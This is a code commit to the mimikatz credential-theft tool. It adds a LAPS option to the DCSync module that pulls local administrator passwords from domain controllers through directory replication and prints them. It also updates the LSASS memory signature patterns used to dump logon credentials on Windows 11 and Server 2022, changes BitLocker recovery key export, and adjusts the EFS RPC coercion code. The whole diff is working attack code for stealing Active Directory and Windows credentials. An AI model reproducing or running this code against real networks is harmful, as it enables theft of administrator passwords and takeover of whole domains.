[new] lsadump::dcsync try to support /laps

[internal] ldap supports authentication [internal] rpc cleanup for EFS [internal] sekurlsa skeleton for 11/2022
dmb2168 · Sep 6, 2021 · 14bbd5c · 14bbd5c
1 parent 17669a9
commit 14bbd5c
Show file tree

Hide file tree

Showing 15 changed files with 307 additions and 120 deletions.
diff --git a/inc/globals.h b/inc/globals.h
@@ -118,7 +118,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_10_1909	18363
 #define KULL_M_WIN_BUILD_10_2004	19041
 #define KULL_M_WIN_BUILD_10_20H2	19042
-
+#define KULL_M_WIN_BUILD_2022		20348
 
 #define KULL_M_WIN_MIN_BUILD_XP		2500
 #define KULL_M_WIN_MIN_BUILD_2K3	3000

diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c
@@ -1551,11 +1551,11 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[])
 										else if(ret == 0)
 										{
 											PRINT_ERROR(L"EfsRpcOpenFileRaw is a success, really? (not normal)\n");
-											EfsRpcCloseRaw(&hEfsHandle);
+											EfsRpcCloseRaw(&hImportCtx);
 										}
 										else
 										{
-											PRINT_ERROR(L"EfsRpcOpenFileRaw: ", ret);
+											PRINT_ERROR(L"EfsRpcOpenFileRaw: %u\n", ret);
 										}
 									}
 									RpcExcept(RPC_EXCEPTION)

diff --git a/mimikatz/modules/kuhl_m_net.c b/mimikatz/modules/kuhl_m_net.c
@@ -645,7 +645,7 @@ NTSTATUS kuhl_m_net_trust(int argc, wchar_t * argv[])
 	else PRINT_ERROR(L"DsEnumerateDomainTrusts: %u\n", ret);
 
 	kprintf(L"\n\nLDAP mode: ");
-	if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn))
+	if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn, NULL))
 	{
 		if(kull_m_string_sprintf(&sysDN, L"CN=System,%s", dn))
 		{
@@ -761,7 +761,7 @@ L")";
 	BOOL isCheckDNS = kull_m_string_args_byName(argc, argv, L"dns", NULL, NULL);
 	kull_m_string_args_byName(argc, argv, L"server", &server, NULL);
 
-	if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn))
+	if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn, NULL))
 	{
 		dwRet = ldap_search_s(ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, &pMessage);
 		if(dwRet == LDAP_SUCCESS)

diff --git a/mimikatz/modules/kuhl_m_sid.c b/mimikatz/modules/kuhl_m_sid.c
@@ -317,7 +317,7 @@ BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR
 	PWCHAR myAttrs[] = {L"name", L"sAMAccountName", L"objectSid", L"sIDHistory", L"objectGUID", NULL}, dn, filter;
 	if(filter = kuhl_m_sid_filterFromArgs(argc, argv))
 	{
-		if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn))
+		if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn, NULL))
 		{
 			*pMessage = NULL;
 			dwErr = ldap_search_s(*ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, pMessage);

diff --git a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.c
@@ -38,14 +38,17 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 	DRS_HANDLE hDrs = NULL;
 	DSNAME dsName = {0};
 	DRS_MSG_GETCHGREQ getChReq = {0};
-	DWORD dwOutVersion = 0, i, AuthnSvc;
+	DWORD dwOutVersion = 0, i, AuthnSvc, suppAtt = 0;
 	DRS_MSG_GETCHGREPLY getChRep;
 	ULONG drsStatus;
 	LPCWSTR szUser = NULL, szGuid = NULL, szDomain = NULL, szDc = NULL, szService;
 	LPWSTR szTmpDc = NULL;
 	DRS_EXTENSIONS_INT DrsExtensionsInt;
 	BOOL someExport = kull_m_string_args_byName(argc, argv, L"export", NULL, NULL), allData = kull_m_string_args_byName(argc, argv, L"all", NULL, NULL), csvOutput = kull_m_string_args_byName(argc, argv, L"csv", NULL, NULL), withDeleted = kull_m_string_args_byName(argc, argv, L"deleted", NULL, NULL), decodeUAC = kull_m_string_args_byName(argc, argv, L"uac", NULL, NULL), bAuthNtlm = kull_m_string_args_byName(argc, argv, L"authntlm", NULL, NULL);
 	SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
+	PWCHAR dn;
+	PLDAP ld;
+	ATTRTYP SuppATT_IntId[2] = {0, 0}; // [0] msMcsAdmPwd, [1] msMcsAdmPwdExpirationTime
 
 	if(!kull_m_string_args_byName(argc, argv, L"domain", &szDomain, NULL))
 		if(kull_m_net_getCurrentDomainInfo(&pPolicyDnsDomainInfo))
@@ -71,6 +74,27 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 					kprintf(L"[DC] \'%s\' will be the user account\n", szUser);
 
 				kull_m_rpc_getArgs(argc, argv, NULL, NULL, NULL, &szService, L"ldap", &AuthnSvc, ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), NULL, &secIdentity, NULL, TRUE);
+
+				if(kull_m_string_args_byName(argc, argv, L"laps", NULL, NULL))
+				{
+					if(kull_m_ldap_getLdapAndRootDN(szDc, L"schemaNamingContext", &ld, &dn, secIdentity.UserLength ? &secIdentity : NULL))
+					{
+						if(
+							kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwd) L"))", SuppATT_IntId + 0)
+							&&
+							kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(ld, dn, L"(&(objectclass=attributeSchema)(attributeID=" TEXT(szOID_ANSI_msMcsAdmPwdExpirationTime) L"))", SuppATT_IntId + 1)
+							)
+						{
+							if(SuppATT_IntId[0] && SuppATT_IntId[1])
+							{
+								suppAtt = 2;
+							}
+						}
+						LocalFree(dn);
+						ldap_unbind(ld);
+					}
+				}
+
 				if(kull_m_rpc_createBinding(NULL, L"ncacn_ip_tcp", szDc, NULL, szService, TRUE, bAuthNtlm ? RPC_C_AUTHN_WINNT : ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? RPC_C_AUTHN_GSS_KERBEROS : RPC_C_AUTHN_GSS_NEGOTIATE), secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hBinding, kull_m_rpc_drsr_RpcSecurityCallback))
 				{
 					if(kull_m_rpc_drsr_getDomainAndUserInfos(&hBinding, szDc, szDomain, &getChReq.V8.uuidDsaObjDest, szUser, szGuid, &dsName.Guid, &DrsExtensionsInt))
@@ -85,10 +109,11 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 							getChReq.V8.cMaxBytes = 0x00a00000; // 10M
 							getChReq.V8.ulExtendedOp = (allData ? 0 : EXOP_REPL_OBJ);
 
-							if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * ((allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
+							if(getChReq.V8.pPartialAttrSet = (PARTIAL_ATTR_VECTOR_V1_EXT *) MIDL_user_allocate(sizeof(PARTIAL_ATTR_VECTOR_V1_EXT) + sizeof(ATTRTYP) * (suppAtt + (allData ? ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export) : ARRAYSIZE(kuhl_m_lsadump_dcsync_oids)) - 1)))
 							{
 								getChReq.V8.pPartialAttrSet->dwVersion = 1;
 								getChReq.V8.pPartialAttrSet->dwReserved1 = 0;
+
 								if(allData)
 								{
 									getChReq.V8.pPartialAttrSet->cAttrs = ARRAYSIZE(kuhl_m_lsadump_dcsync_oids_export);
@@ -101,6 +126,14 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 									for(i = 0; i < getChReq.V8.pPartialAttrSet->cAttrs; i++)
 										kull_m_rpc_drsr_MakeAttid(&getChReq.V8.PrefixTableDest, kuhl_m_lsadump_dcsync_oids[i], &getChReq.V8.pPartialAttrSet->rgPartialAttr[i], TRUE);
 								}
+
+								if(suppAtt)
+								{
+									getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[0];
+									getChReq.V8.pPartialAttrSet->rgPartialAttr[getChReq.V8.pPartialAttrSet->cAttrs++] = SuppATT_IntId[1];
+								}
+
+
 								RpcTryExcept
 								{
 									do
@@ -119,7 +152,7 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 														if(csvOutput)
 															kuhl_m_lsadump_dcsync_descrObject_csv(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, withDeleted, decodeUAC);
 														else
-															kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport);
+															kuhl_m_lsadump_dcsync_descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, someExport, SuppATT_IntId, ARRAYSIZE(SuppATT_IntId));
 														pObject = pObject->pNextEntInf;
 													}
 												}
@@ -169,6 +202,51 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 	return STATUS_SUCCESS;
 }
 
+BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId)
+{
+	BOOL status = FALSE;
+	PWCHAR myAttrs[] = {L"msDS-IntId", NULL};
+	DWORD ret;
+	PLDAPMessage pMessage = NULL, pEntry;
+	PBERVAL *pId;
+	PSTR tmpString;
+
+	ret = ldap_search_s(ld, dn, LDAP_SCOPE_ONELEVEL, req, myAttrs, FALSE, &pMessage);
+	if(ret == LDAP_SUCCESS)
+	{
+		if(ldap_count_entries(ld, pMessage) == 1)
+		{
+			if(pEntry = ldap_first_entry(ld, pMessage))
+			{
+				kprintf(L"[ldap] %s : ", ldap_get_dn(ld, pEntry));
+				pId = ldap_get_values_len(ld, pEntry, myAttrs[0]);
+				if(pId && pId[0])
+				{
+					if(tmpString = (PSTR) LocalAlloc(LPTR, pId[0]->bv_len + 1))
+					{
+						RtlCopyMemory(tmpString, pId[0]->bv_val, pId[0]->bv_len);
+						*pIntId = strtol(tmpString, NULL, 10);
+						kprintf(L"0x%08x\n", *pIntId);
+						status = TRUE;
+
+						LocalFree(tmpString);
+					}
+				}
+				else PRINT_ERROR(L"No values?\n");
+			}
+		}
+		else PRINT_ERROR(L"More than one entry?\n");
+	}
+	else PRINT_ERROR(L"ldap_search_s 0x%x (%u)\n", ret, ret);
+
+	if(pMessage)
+	{
+		ldap_msgfree(pMessage);
+	}
+
+	return status;
+}
+
 BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
 {
 	DWORD i;
@@ -236,13 +314,13 @@ void kuhl_m_lsadump_dcsync_descrObject_csv(SCHEMA_PREFIX_TABLE *prefixTable, ATT
 	}
 }
 
-void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport)
+void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
 {
 	kull_m_rpc_drsr_findPrintMonoAttr(L"\nObject RDN           : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
 
 	kprintf(L"\n");
 	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
-		kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes);
+		kuhl_m_lsadump_dcsync_descrUser(prefixTable, attributes, pSuppATT_IntId, cSuppATT_IntId);
 	else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, NULL, NULL))
 		kuhl_m_lsadump_dcsync_descrBitlocker(prefixTable, attributes, someExport);
 	else if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_trustPartner, NULL, NULL))
@@ -300,41 +378,41 @@ LPCWSTR kuhl_m_lsadump_samAccountType_toString(DWORD accountType)
 
 void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, BOOL someExport)
 {
-	UNICODE_STRING recoveryGuid, uString;
-	wchar_t* shortname = NULL;
+	UNICODE_STRING uString = {0};
 	DWORD szData = 0;
 	PVOID data = 0;
-
-	recoveryGuid.Length = 0;
+	GUID RecoveryGuid;
+	PWCHAR filename;
 
 	kprintf(L"** BITLOCKER RECOVERY INFORMATION **\n\n");
 
 	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVEVolumeGuid, &data, NULL))
 	{
-		if(NT_SUCCESS(RtlStringFromGUID(data, &uString)))
-		{
-			kprintf(L"Volume GUID          : %wZ\n", &uString);
-			RtlFreeUnicodeString(&uString);
-		}
+		kprintf(L"Volume GUID          : ");
+		kull_m_string_displayGUID((LPCGUID) data);
+		kprintf(L"\n");
 	}
 
-	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &data, NULL))
+	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryGuid, &RecoveryGuid, NULL))
+	{
+		kprintf(L"Recovery GUID        : ");
+		kull_m_string_displayGUID(&RecoveryGuid);
+		kprintf(L"\n");
+	}
+	else
 	{
-		if(NT_SUCCESS(RtlStringFromGUID(data, &recoveryGuid)))
+		UuidCreate(&RecoveryGuid);
+		if(someExport)
 		{
-			kprintf(L"Recovery GUID        : %wZ\n", &recoveryGuid);
+			kprintf(L"Recovery GUID (fake) : ");
+			kull_m_string_displayGUID(&RecoveryGuid);
+			kprintf(L"\n");
 		}
 	}
 
 	if(someExport)
 	{
-		if(recoveryGuid.Length <= 0)
-		{
-			recoveryGuid.Buffer = kull_m_string_getRandomGUID();
-			recoveryGuid.Length = (USHORT)wcslen(recoveryGuid.Buffer);
-			kprintf(L"Recovery GUID (fake) : %wZ\n", &recoveryGuid);
-		}
-		shortname = recoveryGuid.Buffer;
+		RtlStringFromGUID(&RecoveryGuid, &uString);
 	}
 
 	if(kull_m_rpc_drsr_findMonoAttr(prefixTable, attributes, szOID_ANSI_msFVERecoveryPassword, &data, &szData))
@@ -345,9 +423,11 @@ void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTR
 
 			if(someExport)
 			{
-				PWCHAR filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, shortname, L"recoveryPassword");
-				kprintf(L"\tExport         : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
-				LocalFree(filename);
+				if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"recoveryPassword"))
+				{
+					kprintf(L"\tExport         : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
+					LocalFree(filename);
+				}
 			}
 		}
 	}
@@ -356,25 +436,28 @@ void kuhl_m_lsadump_dcsync_descrBitlocker(SCHEMA_PREFIX_TABLE* prefixTable, ATTR
 	{
 		if(szData > 0)
 		{
-			kprintf(L"Key Package Size     : %u byte(s)\n", szData);
-			kprintf(L"Key Package          : [");
+			kprintf(L"Key Package Size     : %u byte(s)\nKey Package          : [", szData);
 			kull_m_string_wprintf_hex(data, szData, 0);
 			kprintf(L"]\n");
 
 			if (someExport)
 			{
-				PWCHAR filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, shortname, L"keyPackage");
-				kprintf(L"\tExport         : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
-				LocalFree(filename);
+				if(filename = kuhl_m_crypto_generateFileName(L"ntds", L"bitlocker", 0, uString.Buffer ? uString.Buffer : L"(noguid)", L"keyPackage"))
+				{
+					kprintf(L"\tExport         : %s - \'%s\'\n", kull_m_file_writeData(filename, (PBYTE)data, szData) ? L"OK" : L"KO", filename);
+					LocalFree(filename);
+				}
 			}
 		}
 	}
 
-	if (recoveryGuid.Length > 0)
-		RtlFreeUnicodeString(&recoveryGuid);
+	if (uString.Buffer)
+	{
+		RtlFreeUnicodeString(&uString);
+	}
 }
 
-void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes)
+void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId)
 {
 	DWORD rid = 0, i;
 	PBYTE encodedData;
@@ -447,6 +530,21 @@ void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK
 		kprintf(L"\nSupplemental Credentials:\n");
 		kuhl_m_lsadump_dcsync_descrUserProperties((PUSER_PROPERTIES) encodedData);
 	}
+
+	if((cSuppATT_IntId >= 2) && pSuppATT_IntId[0] && pSuppATT_IntId[1])
+	{
+		kprintf(L"LAPS:\n");
+		if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[0], &encodedData, &encodedDataSize))
+		{
+			kprintf(L"  Password   : %.*S\n", encodedDataSize, encodedData);
+		}
+		if(kull_m_rpc_drsr_findMonoAttrNoOID(attributes, pSuppATT_IntId[1], &data, NULL))
+		{
+			kprintf(L"  Last change: ");
+			kull_m_string_displayLocalFileTime((LPFILETIME) data);
+			kprintf(L"\n");
+		}
+	}
 }
 
 DECLARE_CONST_UNICODE_STRING(PrimaryCleartext, L"Primary:CLEARTEXT");

diff --git a/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h b/mimikatz/modules/lsadump/kuhl_m_lsadump_dc.h
@@ -13,6 +13,7 @@
 #include "../kuhl_m.h"
 #include "../kuhl_m_lsadump.h" // to move
 #include "../modules/kull_m_string.h"
+#include "../modules/kull_m_ldap.h"
 
 NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_lsadump_dcshadow(int argc, wchar_t * argv[]);
@@ -40,9 +41,10 @@ typedef struct _USER_PROPERTIES {
 
 const wchar_t * KUHL_M_LSADUMP_UF_FLAG[32];
 
+BOOL kuhl_m_lsadump_dcsync_SearchAndParseLDAPToIntId(PLDAP ld, PWCHAR dn, PWCHAR req, ATTRTYP *pIntId);
 BOOL kuhl_m_lsadump_dcsync_decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory);
-void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport);
-void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes);
+void kuhl_m_lsadump_dcsync_descrObject(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain, BOOL someExport, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
+void kuhl_m_lsadump_dcsync_descrUser(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, ATTRTYP *pSuppATT_IntId, DWORD cSuppATT_IntId);
 void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties);
 void kuhl_m_lsadump_dcsync_descrTrust(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCWSTR szSrcDomain);
 void kuhl_m_lsadump_dcsync_descrTrustAuthentication(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, PCUNICODE_STRING domain, PCUNICODE_STRING partner, BOOL isIn);

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
@@ -30,7 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_10_1703,	{sizeof(PTRN_WN1703_LogonSessionList),	PTRN_WN1703_LogonSessionList},	{0, NULL}, {23,  -4}},
 	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_WN1803_LogonSessionList),	PTRN_WN1803_LogonSessionList},	{0, NULL}, {23,  -4}},
 	{KULL_M_WIN_BUILD_10_1903,	{sizeof(PTRN_WN6x_LogonSessionList),	PTRN_WN6x_LogonSessionList},	{0, NULL}, {23,  -4}},
-	{KULL_M_WIN_MIN_BUILD_11,	{sizeof(PTRN_WN11_LogonSessionList),	PTRN_WN11_LogonSessionList},	{0, NULL}, {24,  -4}},
+	{KULL_M_WIN_BUILD_2022,		{sizeof(PTRN_WN11_LogonSessionList),	PTRN_WN11_LogonSessionList},	{0, NULL}, {24,  -4}},
 };
 #elif defined(_M_IX86)
 BYTE PTRN_WN51_LogonSessionList[]	= {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84};

diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c
@@ -6,11 +6,9 @@
 #include "kuhl_m_sekurlsa_cloudap.h"
 
 #if defined(_M_X64)
-BYTE PTRN_WALL_CloudApLocateLogonSession[]	= {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75};
-BYTE PTRN_WN11_CloudApLocateLogonSession[]	= {0x48, 0x8b, 0xd1, 0x49, 0x3b, 0xc1, 0x75};
+BYTE PTRN_WALL_CloudApLocateLogonSession[]	= {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42};//, 0x18, 0x75};
 KULL_M_PATCH_GENERIC CloudApReferences[] = {
 	{KULL_M_WIN_BUILD_10_1909,	{sizeof(PTRN_WALL_CloudApLocateLogonSession),	PTRN_WALL_CloudApLocateLogonSession},	{0, NULL}, {-9}},
-	{KULL_M_WIN_MIN_BUILD_11,	{sizeof(PTRN_WN11_CloudApLocateLogonSession),	PTRN_WN11_CloudApLocateLogonSession},	{0, NULL}, {-4}},
 };
 #elif defined(_M_IX86)
 BYTE PTRN_WALL_CloudApLocateLogonSession[]	= {0x8b, 0x31, 0x39, 0x72, 0x10, 0x75};
@@ -37,7 +35,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURIT
 	KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
 	KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
 
-	if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL)/*(CloudApGlobalLogonSessionList = (PKIWI_CLOUDAP_LOGON_LIST_ENTRY) ((PBYTE) kuhl_m_sekurlsa_cloudap_package.Module.Informations.DllBase.address + 0x71100))*/)
+	if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
 	{
 		aLsassMemory.address = CloudApGlobalLogonSessionList;
 		if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))